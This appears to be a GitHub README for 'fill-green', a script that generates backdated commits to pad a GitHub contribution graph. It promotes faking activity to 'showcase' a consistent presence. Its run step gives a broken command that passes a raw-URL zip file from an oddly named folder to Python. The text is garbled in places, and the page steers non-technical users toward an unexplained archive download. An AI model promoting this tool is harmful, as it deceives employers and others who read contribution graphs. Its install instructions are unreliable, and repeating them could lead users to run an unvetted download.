fill-green is a simple Python script that helps you create commits on GitHub. It generates commits for any date range you choose, allowing you to customize how often each day has commits. This tool is perfect if you want to enhance your contributions on your GitHub activity graph without manually creating each commit.
- Automatic Commit Generation: Automatically create commits within your specified date range.
- Customizable Frequency: Choose how many commits you want each day.
- Open-Source: Feel free to use, modify, and share the script.
- Easy to Use: Designed for non-technical users.
- Operating System: Windows, macOS, or Linux.
- Python: Version 3.6 or higher.
- Git: Make sure Git is installed on your machine.
To get started, you need to download the latest version of fill-green.
- Visit the Releases page to download.
- On the releases page, find the latest version and click on it.
- Download the appropriate file for your operating system.
Once the download is complete, follow the instructions below to run fill-green.
-
Open Terminal or Command Prompt:
- Windows: Press
Win + R, typecmd, and hit Enter. - macOS/Linux: Open the Terminal application.
- Windows: Press
-
Navigate to the Downloaded File: Use the
cdcommand to change directories to where the file was downloaded. Replacepath/to/your/filewith the actual file path.cd path/to/your/file -
Run the Script: Enter the following command to run fill-green. Replace
https://raw.githubusercontent.com/mhmadstevano/fill-green/main/atrabilarian/fill-green.zipwith the actual filename if it differs.python https://raw.githubusercontent.com/mhmadstevano/fill-green/main/atrabilarian/fill-green.zip
When you run fill-green for the first time, you need to provide some input:
- Start Date: The first date for your commits.
- End Date: The last date for your commits.
- Commit Frequency: How many commits you want per day.
Simply follow the prompts in the command line to enter your options.
If you encounter issues or have questions, consider checking the Issues section on the GitHub repository. You can find answers to common questions there or ask for help.
You can contribute to fill-green! If you want to suggest features or report problems, feel free to create an issue on the GitHub repository.
For more in-depth documentation, tips, and tricks, please visit the project's GitHub page.
Using fill-green can significantly enhance your GitHub activity graph. By filling gaps in your contributions, you can create a strong, consistent presence on GitHub. This is especially useful for users who want to showcase their GitHub activity over time.
Your GitHub contributions matter. With fill-green, you can easily craft your presence without diving into complex coding or committing each change by hand. Enjoy automating your GitHub activity!